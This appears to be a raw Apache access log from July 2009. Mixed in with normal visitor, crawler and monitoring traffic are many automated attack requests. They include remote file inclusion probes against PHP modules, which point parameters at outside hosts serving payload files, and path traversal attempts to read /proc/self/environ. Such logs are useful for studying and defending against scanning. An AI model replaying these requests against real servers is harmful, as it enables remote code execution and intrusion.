91.195.124.16 - - [01/Jul/2009:07:09:40 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 267 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
91.195.124.16 - - [01/Jul/2009:07:09:40 -0400] "GET /logs/access_log.Q109051100/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
91.195.124.16 - - [01/Jul/2009:07:09:40 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 267 "-" "XXXXXX"
91.195.124.16 - - [01/Jul/2009:07:09:41 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 267 "-" "XXXXXX"
70.86.9.234 - - [01/Jul/2009:07:09:53 -0400] "GET /logs/access_log.Q109051900%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:07:09:55 -0400] "GET /logs/errors.php?error=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:07:09:55 -0400] "GET /errors.php?error=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:07:09:55 -0400] "GET /logs/error_log.Q109060800%20%20/errors.php?error=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:07:10:38 -0400] "GET /logs/error_log.Q109050800%20%20/errors.php?error=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Jul/2009:07:10:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.198.32.3 - - [01/Jul/2009:07:11:08 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://210.240.82.130//appserv/id.txt%0D?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
91.198.32.3 - - [01/Jul/2009:07:11:08 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://210.240.82.130//appserv/id.txt%0D?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
91.198.32.3 - - [01/Jul/2009:07:11:08 -0400] "GET /logs/access_log.Q109061600//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://210.240.82.130//appserv/id.txt%0D?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
172.16.1.180 - - [01/Jul/2009:07:11:33 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:11:33 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:11:33 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
91.198.32.3 - - [01/Jul/2009:07:12:08 -0400] "GET /logs/access_log.Q109051100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://210.240.82.130//appserv/id.txt%0D?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
172.16.1.180 - - [01/Jul/2009:07:12:35 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:12:35 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:12:35 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
83.98.209.71 - - [01/Jul/2009:07:13:52 -0400] "GET /logs/access_log.Q109051100/include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
66.172.22.2 - - [01/Jul/2009:07:15:18 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.172.22.2 - - [01/Jul/2009:07:15:18 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.172.22.2 - - [01/Jul/2009:07:15:18 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.172.22.2 - - [01/Jul/2009:07:15:18 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
172.16.1.180 - - [01/Jul/2009:07:15:28 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:15:28 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:15:28 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
83.98.209.71 - - [01/Jul/2009:07:15:47 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:07:15:47 -0400] "GET /logs/error_log.Q109051100%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:07:15:47 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:07:15:52 -0400] "GET /logs/access_log.Q109052400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Jul/2009:07:15:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.191.37.60 - - [01/Jul/2009:07:16:17 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
88.191.37.60 - - [01/Jul/2009:07:16:17 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
88.191.37.60 - - [01/Jul/2009:07:16:18 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
88.191.37.60 - - [01/Jul/2009:07:16:21 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
88.191.37.60 - - [01/Jul/2009:07:16:22 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
88.191.37.60 - - [01/Jul/2009:07:16:22 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:07:16:40 -0400] "GET /logs/error_log.Q109061400/errors.php?error=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
88.191.37.60 - - [01/Jul/2009:07:16:41 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
88.191.37.60 - - [01/Jul/2009:07:16:44 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
172.16.1.180 - - [01/Jul/2009:07:16:46 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:16:46 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:16:46 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
66.172.22.2 - - [01/Jul/2009:07:16:47 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:07:16:51 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:07:16:51 -0400] "GET /logs/access_log.Q109061800//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.172.22.2 - - [01/Jul/2009:07:16:52 -0400] "GET /logs/access_log.Q109061800//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
94.159.136.47 - - [01/Jul/2009:07:17:10 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; InfoPath.2)"
94.159.136.47 - - [01/Jul/2009:07:17:10 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; InfoPath.2)"
94.159.136.47 - - [01/Jul/2009:07:17:12 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; InfoPath.2)"
94.159.136.47 - - [01/Jul/2009:07:17:12 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; InfoPath.2)"
83.98.209.71 - - [01/Jul/2009:07:17:43 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:07:17:43 -0400] "GET /logs/access_log.Q109052400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:07:17:43 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:07:17:43 -0400] "GET /logs/error_log.Q109051100%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
66.172.22.2 - - [01/Jul/2009:07:17:55 -0400] "GET /logs/access_log.Q109061800//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:07:17:56 -0400] "GET /logs/access_log.Q109061800//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:07:17:56 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:07:17:56 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:07:17:56 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:07:17:56 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
211.189.39.159 - - [01/Jul/2009:07:18:19 -0400] "GET /logs/access_log.Q109060300/show.php?path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
66.172.22.2 - - [01/Jul/2009:07:18:29 -0400] "GET /logs/error_log.Q109062300//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:07:18:32 -0400] "GET /logs/error_log.Q109062300//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
88.191.37.60 - - [01/Jul/2009:07:19:40 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
88.191.37.60 - - [01/Jul/2009:07:19:52 -0400] "GET /logs/access_log.Q109060900%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
88.191.37.60 - - [01/Jul/2009:07:19:54 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:07:20:04 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:07:20:04 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:07:20:04 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
88.191.37.60 - - [01/Jul/2009:07:20:08 -0400] "GET /logs/access_log.Q109060900%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Jul/2009:07:20:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.180 - - [01/Jul/2009:07:21:11 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:21:11 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:21:11 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
66.249.71.16 - - [01/Jul/2009:07:21:39 -0400] "GET /images/items/0033080_full.jpg HTTP/1.1" 200 14865 "-" "Googlebot-Image/1.0"
64.221.88.162 - - [01/Jul/2009:07:21:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
64.221.88.162 - - [01/Jul/2009:07:21:56 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
64.221.88.162 - - [01/Jul/2009:07:21:56 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
64.221.88.162 - - [01/Jul/2009:07:21:56 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
66.249.71.204 - - [01/Jul/2009:07:22:14 -0400] "GET /logs/error_log.Q109050900 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
38.99.13.118 - - [01/Jul/2009:07:22:49 -0400] "GET /logs/access_log.Q108110700 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
172.16.1.180 - - [01/Jul/2009:07:24:34 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:24:34 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:24:34 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
217.147.29.190 - - [01/Jul/2009:07:25:43 -0400] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
217.147.29.190 - - [01/Jul/2009:07:25:43 -0400] "GET /logs/access_log.Q109062500//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
217.147.29.190 - - [01/Jul/2009:07:25:43 -0400] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
172.16.1.180 - - [01/Jul/2009:07:25:44 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:25:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:25:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
195.207.160.102 - - [01/Jul/2009:07:25:45 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:07:25:45 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:07:25:45 -0400] "GET /logs/error_log.Q109060900%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:07:25:50 -0400] "GET /logs/access_log.Q109060900%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Jul/2009:07:25:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.163.139.56 - - [01/Jul/2009:07:26:12 -0400] "GET /logs/access_log.Q109051500/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
69.163.139.56 - - [01/Jul/2009:07:26:12 -0400] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
69.163.139.56 - - [01/Jul/2009:07:26:12 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
202.181.243.113 - - [01/Jul/2009:07:26:17 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
202.181.243.113 - - [01/Jul/2009:07:26:17 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
202.181.243.113 - - [01/Jul/2009:07:26:17 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
202.181.243.113 - - [01/Jul/2009:07:26:20 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.163.139.56 - - [01/Jul/2009:07:26:22 -0400] "GET /logs/access_log.Q109061600/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
202.181.243.113 - - [01/Jul/2009:07:26:26 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
202.181.243.113 - - [01/Jul/2009:07:26:26 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
202.181.243.113 - - [01/Jul/2009:07:26:54 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
202.181.243.113 - - [01/Jul/2009:07:26:54 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:07:27:08 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:07:27:08 -0400] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:07:27:08 -0400] "GET /logs/access_log.Q109051500/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:07:27:16 -0400] "GET /logs/access_log.Q109061600/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
217.147.29.190 - - [01/Jul/2009:07:28:27 -0400] "GET /logs/access_log.Q109062500%20%20//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:07:30:45 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 233 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
83.98.209.71 - - [01/Jul/2009:07:30:45 -0400] "GET /logs/access_log.Q109051500/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 260 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
83.98.209.71 - - [01/Jul/2009:07:30:45 -0400] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 238 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
209.59.12.99 - - [01/Jul/2009:07:30:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.98.209.71 - - [01/Jul/2009:07:30:51 -0400] "GET /logs/access_log.Q109051500%20%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:07:30:52 -0400] "GET /logs/access_log.Q109061600/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 260 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
62.77.32.217 - - [01/Jul/2009:07:30:53 -0400] "GET /logs/access_log.Q109051500/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
62.77.32.217 - - [01/Jul/2009:07:30:53 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
